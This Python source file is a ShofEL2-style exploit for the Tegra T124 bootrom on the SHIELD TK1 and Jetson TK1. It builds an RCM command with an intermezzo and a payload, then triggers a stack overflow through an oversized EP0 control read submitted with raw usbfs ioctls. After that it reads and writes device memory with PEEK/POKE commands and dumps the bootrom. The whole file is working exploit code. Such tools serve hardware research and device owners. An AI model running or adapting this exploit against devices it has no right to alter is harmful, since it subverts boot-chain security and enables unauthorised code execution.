from io import BytesIO
import usb.core
import usb.util
import sys
import struct
from tools import *
import argparse
import ctypes
import time
import fcntl
import platform
import os
from patches import *

# True on macOS, where the raw usbfs ioctl path below is not available.
IS_OSX = platform.system() == "Darwin"

# Linux usbfs interface (linux/usbdevice_fs.h).
USBDEVFS_URB_TYPE_CONTROL = 2


def _ioc(direction, type_char, number, size):
    """Encode an ioctl request number using the asm-generic ``_IOC`` layout."""
    return (direction << 30) | (size << 16) | (ord(type_char) << 8) | number


# Native size of the fixed part of ``struct usbdevfs_urb``. It (and the pointer
# size) differs between 32- and 64-bit hosts, and both are encoded into the
# request numbers, so they are derived here instead of hard-coded.
_USBDEVFS_URB_SIZE = struct.calcsize("@BBiIPiiiiiIP")
USBDEVFS_SUBMITURB = _ioc(2, "U", 10, _USBDEVFS_URB_SIZE)   # _IOR('U', 10, struct usbdevfs_urb)
USBDEVFS_REAPURB = _ioc(1, "U", 12, struct.calcsize("P"))   # _IOW('U', 12, void *)
USBDEVFS_DISCARDURB = _ioc(0, "U", 11, 0)                   # _IO('U', 11)

# Set to 1 to hex-dump every USB read/write done through DEVICE.
debug_exchanges = 0
class DEVICE():
    """pyusb-backed transport to a Tegra device in APX mode.

    ``self.dev`` is the pyusb device found by :meth:`usb_connect`;
    ``self.write`` / ``self.read`` are aliases of :meth:`usb_write` /
    :meth:`usb_read`.
    """

    def usb_connect(self, poll_interval=0.1):
        """Wait until a supported APX device appears, then detach kernel drivers.

        Probes the SHIELD TK1 and then the Jetson TK1 VID/PID pairs on every
        attempt, sleeping *poll_interval* seconds between attempts so the wait
        does not spin a CPU core. Blocks until a device is found.
        """
        candidates = (
            (SHIELD_TK1_VID, SHIELD_TK1_PID),
            (JETSON_TK1_VID, JETSON_TK1_PID),
        )
        self.dev = None
        waiting_reported = False
        while self.dev is None:
            for vid, pid in candidates:
                self.dev = usb.core.find(idVendor=vid, idProduct=pid)
                if self.dev is not None:
                    break
            else:
                # No candidate present yet: report once, then back off.
                if not waiting_reported:
                    info("Waiting for APX device...")
                    waiting_reported = True
                time.sleep(poll_interval)

        self._detach_kernel_drivers()

    def _detach_kernel_drivers(self, interface=0):
        """Detach kernel drivers from *interface* until none is left.

        Detaching is repeated until the backend reports ENOENT (no driver
        active). Any other failure, such as a backend without detach support or
        a permission error, is logged and ends the loop instead of retrying
        forever.
        """
        import errno

        while True:
            try:
                self.dev.detach_kernel_driver(interface=interface)
            except Exception as e:  # usb.core.USBError or backend-specific errors
                if getattr(e, "errno", None) != errno.ENOENT:
                    info(f"Could not detach kernel driver: {e}")
                return

    def usb_read(self, size, title="recv data"):
        """Read up to *size* bytes from endpoint 0x81 and return them as ``bytes``.

        The received data is hex-dumped under *title* when ``debug_exchanges`` is 1.
        """
        IN = 0x81
        data = bytes(self.dev.read(IN, size))
        if debug_exchanges == 1:
            hexdump(data, title=title)
        return data

    def usb_write(self, data):
        """Write *data* to endpoint 0x01 (hex-dumped when ``debug_exchanges`` is 1)."""
        OUT = 0x1
        self.dev.write(OUT, data)
        if debug_exchanges == 1:
            hexdump(data, color=5, title="out")

    def usb_reset(self):
        """Reset the USB device."""
        self.dev.reset()

    def __init__(self):
        self.usb_connect()
        self.write = self.usb_write
        self.read = self.usb_read

    def read_chip_id(self):
        """Read 0x10 bytes from the device, log them as the chip id and return them."""
        r = self.usb_read(0x10)
        info(f"Chip id: {r.hex()}")
        return r

def get_fds():
    """Return the set of file-descriptor numbers currently open in this process.

    Reads the Linux-specific ``/proc/self/fd`` directory. NOTE: the listing may
    also include the descriptor used to read that directory itself.
    """
    entries = os.listdir("/proc/self/fd")
    return {int(entry) for entry in entries}

class TegraRCM():
    """Sends an RCM command with a payload and talks to it over PEEK/POKE.

    ``self.dev`` is a ``DEVICE``. On Linux, ``self.fds`` holds the file
    descriptors that appeared while the device was being opened; presumably
    one of them is the usbfs node of the device, which ``ep0_read_unbounded``
    probes with raw usbfs ioctls.
    """

    # Native layout of the fixed header of Linux ``struct usbdevfs_urb``:
    # type, endpoint, status, flags, buffer, buffer_length, actual_length,
    # start_frame, number_of_packets, error_count, signr, usercontext.
    _URB_HEADER = struct.Struct("@BBiIPiiiiiIP")
    # Marker stored in ``usercontext`` to recognise our URB after reaping.
    _URB_CONTEXT = 0xf0f

    def ep0_read_unbounded(self, size):
        """Submit an EP0 control IN request with ``wLength=size``, then abort it.

        The setup packet is bmRequestType 0x82 / bRequest 0 (GET_STATUS) with a
        caller-chosen length; ``send_payload`` uses it to smash the stack.
        On Linux the request is submitted as a raw usbfs URB on each candidate
        descriptor, discarded right away and then reaped.

        Returns:
            The reaped URB status (0 means the transfer completed normally);
            on macOS 0 if the transfer completed, None if it raised a USB error
            (the expected timeout); None if no descriptor accepted the URB.
        """
        print("Size: 0x%x\n" % size)
        if IS_OSX:
            # No usbfs ioctls on macOS: go through pyusb; a timeout is the
            # desired outcome.
            try:
                self.dev.dev.ctrl_transfer(0x82, 0, 0, 0, size)
            except usb.core.USBError:
                print("timeout.. good!")
                return None
            # Completed normally: report it like a URB finishing with status 0.
            return 0

        setup = ctypes.create_string_buffer(
            struct.pack("@BBHHH%dx" % size, 0x82, 0, 0, 0, size))
        print(bytes(setup[:8]).hex())
        # The 1024 bytes of padding make the URB buffer longer than 1024 bytes,
        # so fcntl.ioctl() passes it to the kernel in place instead of through a
        # temporary copy: the kernel identifies the URB by this user-space
        # address when discarding and reaping it.
        urb = ctypes.create_string_buffer(
            self._URB_HEADER.pack(
                USBDEVFS_URB_TYPE_CONTROL, 0,              # type, endpoint
                0, 0,                                      # status, flags
                ctypes.addressof(setup), len(setup), 0,    # buffer, length, actual
                0, 0, 0, 0,                                # start_frame, packets, errors, signr
                self._URB_CONTEXT,                         # usercontext
            ) + bytes(1024))
        urb_addr = ctypes.addressof(urb)
        print(bytes(urb[:-1024]).hex())
        print("URB address: 0x%x" % urb_addr)

        for fd in self.fds:
            try:
                fcntl.ioctl(fd, USBDEVFS_SUBMITURB, urb)
            except OSError:
                # Not a usbfs node for this device (or already closed).
                continue
            try:
                fcntl.ioctl(fd, USBDEVFS_DISCARDURB, urb)
            except OSError:
                # Discarding can fail when the URB has already completed; it
                # still has to be reaped to learn its status.
                pass
            purb = ctypes.c_void_p()
            try:
                fcntl.ioctl(fd, USBDEVFS_REAPURB, purb)
            except OSError as e:
                print(f"Failed to reap URB on {fd}: {e}")
                continue
            if purb.value != urb_addr:
                print("Reaped the wrong URB! addr 0x%x != 0x%x" % (
                    purb.value or 0, urb_addr))
            fields = self._URB_HEADER.unpack(urb.raw[:self._URB_HEADER.size])
            status, ctx = fields[2], fields[-1]
            print("URB status: %d" % status)
            if ctx != self._URB_CONTEXT:
                print("Reaped the wrong URB! ctx=0x%x" % ctx)
            info(f"Done on {fd}")
            return status
        return None

    def __init__(self):
        fds_before = set() if IS_OSX else get_fds()
        self.dev = DEVICE()
        self.fds = set()
        self.fd = None
        if not IS_OSX:
            self.fds = get_fds() - fds_before
            if self.fds:
                self.fd = max(self.fds)
                info("File descriptor: %d" % self.fd)
            else:
                error("No new file descriptors appeared while opening the device!")

    def get_payload_aft_len(self, payload):
        """Return how many bytes of *payload* exceed ``MAX_PAYLOAD_BEF_SIZE``.

        *payload* is a seekable binary file; it is left positioned at offset 0.
        Exits with ``ERROR_STATUS`` if it is larger than ``MAX_PAYLOAD_FILE_SIZE``.
        """
        payload.seek(0, os.SEEK_END)
        sz = payload.tell()
        payload.seek(0)
        if sz > MAX_PAYLOAD_FILE_SIZE:
            error("Payload to big!")
            sys.exit(ERROR_STATUS)
        return max(0, sz - MAX_PAYLOAD_BEF_SIZE)

    def read_intermezzo(self, rcm_cmd_buf: BytesIO,
                        intermezzo_path="ShofEL2-for-T124/intermezzo.bin"):
        """Copy up to ``INTERMEZZO_LEN`` bytes of *intermezzo_path* into the command buffer."""
        with open(intermezzo_path, "rb") as f:
            intermezzo = f.read(INTERMEZZO_LEN)
        rcm_cmd_buf.seek(RCM_CMD_BUF_INTERMEZZO_START)
        rcm_cmd_buf.write(intermezzo)

    def read_payload_file(self, payload_file_fd, rcm_cmd_buf, rcm_cmd_buf_len):
        """Place the payload into the command buffer in two parts.

        The first ``MAX_PAYLOAD_BEF_SIZE`` bytes go to
        ``RCM_CMD_BUF_PAYLOAD_START``; if the buffer extends past
        ``RCM_CMD_BUF_PAYLOAD_CONT``, the remainder goes there. Both part
        lengths are stored as little-endian 32-bit words.
        """
        payload_bef = payload_file_fd.read(MAX_PAYLOAD_BEF_SIZE)
        rcm_cmd_buf.seek(RCM_CMD_BUF_PAYLOAD_START)
        rcm_cmd_buf.write(payload_bef)

        payload_aft = b""
        if rcm_cmd_buf_len > RCM_CMD_BUF_PAYLOAD_CONT:
            payload_aft = payload_file_fd.read(rcm_cmd_buf_len - RCM_CMD_BUF_PAYLOAD_CONT)
            rcm_cmd_buf.seek(RCM_CMD_BUF_PAYLOAD_CONT)
            rcm_cmd_buf.write(payload_aft)

        rcm_cmd_buf.seek(RCM_CMD_BUF_PAYLOAD_BEF_LENVAR)
        rcm_cmd_buf.write(struct.pack("<L", len(payload_bef)))
        rcm_cmd_buf.seek(RCM_CMD_BUF_PAYLOAD_AFT_LENVAR)
        rcm_cmd_buf.write(struct.pack("<L", len(payload_aft)))

    def build_rcm_cmd(self, payload_file_fd, rcm_cmd_buf, rcm_cmd_buf_len, payload_thumb_mode):
        """Fill *rcm_cmd_buf* with the intermezzo, the payload and the header words."""
        self.read_intermezzo(rcm_cmd_buf)
        self.read_payload_file(payload_file_fd, rcm_cmd_buf, rcm_cmd_buf_len)

        rcm_cmd_buf.seek(0)
        rcm_cmd_buf.write(struct.pack("<L", RCM_CMD_LEN))
        rcm_cmd_buf.seek(RCM_CMD_BUF_MEMCPY_RET_ADD)
        # Entry address with bit 0 set -- presumably so execution continues in
        # Thumb state; confirm against the intermezzo.
        rcm_cmd_buf.write(struct.pack("<L", BOOTROM_PAYLOAD_ENTRY | 0x1))
        rcm_cmd_buf.seek(RCM_CMD_BUF_PAYLOAD_THUMB_MODE)
        rcm_cmd_buf.write(struct.pack("<L", payload_thumb_mode))

    def send_rcm_cmd(self, payload_filename, payload_thumb_mode=1):
        """Build the RCM command for *payload_filename* and send it in one write."""
        with open(payload_filename, "rb") as payload_file_fd:
            payload_aft_len = self.get_payload_aft_len(payload_file_fd)
            if payload_aft_len < 0:
                sys.exit(ERROR_STATUS)

            rcm_cmd_buf_len = RCM_CMD_BUF_PAYLOAD_CONT + payload_aft_len
            # Pad to whole 0x1000-byte blocks (always at least one byte of
            # padding), then add one more block if the block count is even.
            padding = 0x1000 - (rcm_cmd_buf_len % 0x1000)
            n_writes = (rcm_cmd_buf_len + padding) // 0x1000
            if n_writes % 2 == 0:
                padding += 0x1000

            rcm_cmd_buf = BytesIO(bytes(rcm_cmd_buf_len + padding))
            self.build_rcm_cmd(payload_file_fd, rcm_cmd_buf, rcm_cmd_buf_len, payload_thumb_mode)
        self.dev.write(rcm_cmd_buf.getvalue())

    def send_payload(self, payload, thumb=1):
        '''
        Sends user specified payload to device, then triggers it with an
        oversized EP0 read. Returns the status from ``ep0_read_unbounded``.
        '''
        self.send_rcm_cmd(payload, thumb)

        # Smash the stack
        status = self.ep0_read_unbounded(BOOTROM_SMASH_LEN)
        if status == 0:
            error("wrong status returned!")
        return status

    def send_verify_cmd(self, cmd):
        """Send *cmd* and return True if the device echoes it back unchanged."""
        self.dev.write(cmd)
        r = self.dev.read(0x200)
        if r != cmd:
            error(f"Error on sending command! {r}")
            return False
        return True

    def handle_done(self):
        """Read the device's completion marker; return True if it is ``b"done"``."""
        r = self.dev.read(0x200)
        if r != b"done":
            error(f"Expected 'done' from device, got {r!r}")
            return False
        return True

    def memdump_region(self, offset, size):
        """Read *size* bytes at *offset* with the PEEK command.

        Data arrives in blocks of at most 0x200 bytes; each complete block is
        acknowledged with ``b"ACK\\x00"``. Returns the bytes, or None if the
        device did not echo the command.
        """
        if not self.send_verify_cmd(b"PEEK"):
            return None
        self.dev.write(struct.pack('<LL', offset, size))
        received = bytearray()
        while len(received) < size:
            blk_sz = min(0x200, size - len(received))
            d = self.dev.read(blk_sz)
            if len(d) == blk_sz:
                self.dev.write(b"ACK\x00")
            received += d
        self.handle_done()
        return bytes(received)

    def memwrite_region(self, address, data, check=True):
        '''
        Write a blob of data to an address on the device with the POKE command.
        Sometimes this function has issues when writing more than 0x20 bytes of data.

        Args:
            address (int): Address to write to.
            data (bytes): Binary data to write, sent in chunks of at most 0x200 bytes.
            check (bool): Dump the region before and after the write and report
                an error if it did not change although *data* differs from it.
        '''
        size = len(data)
        before = self.memdump_region(address, size) if check else None

        if not self.send_verify_cmd(b"POKE"):
            return
        self.dev.write(struct.pack('<II', address, size))

        for start in range(0, size, 0x200):
            self.dev.write(data[start:start + 0x200])
            message = self.dev.read(0x200)
            if message != b"OK":
                error("Error on writing data to device!")
                return
            self.dev.write(b"ACK\x00")
        self.handle_done()

        # Read back and compare against the whole blob, not just its last chunk.
        if check:
            after = self.memdump_region(address, size)
            if after == before and data != before:
                error(f"Memory written succesfully, but no changes detected! | {hex(address)}")

    def search_bootrom(self, start=0, end=0x1000000, step=0x10000):
        """Dump [start, end) in *step*-sized pieces and log where CPSR patterns occur.

        Returns the dumped bytes (possibly truncated if a dump fails).
        """
        dumped = BytesIO()
        for addr in range(start, end, step):
            d = self.memdump_region(addr, step)
            if d is None:
                error(f"Failed to dump memory at {hex(addr)}")
                break
            dumped.write(d)
            if cpsr_to_r0_ins in d or r1_to_cpsr in d:
                info(f"Found cpsr instruction at {hex(addr)}")
            print(".", end="", flush=True)
        print()
        return dumped.getvalue()

    def dump_bootrom(self):
        """Dump 0x1000 bytes at 0x100000 and return them (None on failure)."""
        return self.memdump_region(0x100000, 0x1000)

    def cmd_handler(self):
        """Serve payload requests forever.

        On ``b"cmd_handler"``: fill 0x100 bytes at 0x40000000 with 0xaa,
        scan memory for the CPSR patterns, then dump memory.
        """
        while True:
            cmd = self.dev.read(0x200)
            if cmd == b"cmd_handler":
                self.memwrite_region(0x40000000, 0x100 * b"\xaa")
                self.search_bootrom()
                self.dump_bootrom()

if __name__ == "__main__":
    # Send the payload over RCM, then either wait for the GA debugger marker
    # (--ga / --ga_arm) or serve the payload's requests.
    parser = argparse.ArgumentParser()
    parser.add_argument("payload", help="Payload to send to the tablet")
    parser.add_argument("--ga", help="Prepare for GA", action="store_true")
    parser.add_argument("--ga_arm", action="store_true",
                        help="Prepare for GA with a non-Thumb (ARM) payload; implies --ga")

    args = parser.parse_args()
    rcm = TegraRCM()
    rcm.dev.read_chip_id()
    if args.ga_arm:
        args.ga = True
    # --ga_arm payloads are sent with thumb=0; everything else keeps thumb=1.
    rcm.send_payload(args.payload, thumb=0 if args.ga_arm else 1)
    if args.ga:
        d = rcm.dev.read(4)
        if d == b"GiAs":
            ok("Device in GA debugger")
        else:
            error(f"Did not receive the GA marker, got {d!r}")
    else:
        rcm.cmd_handler()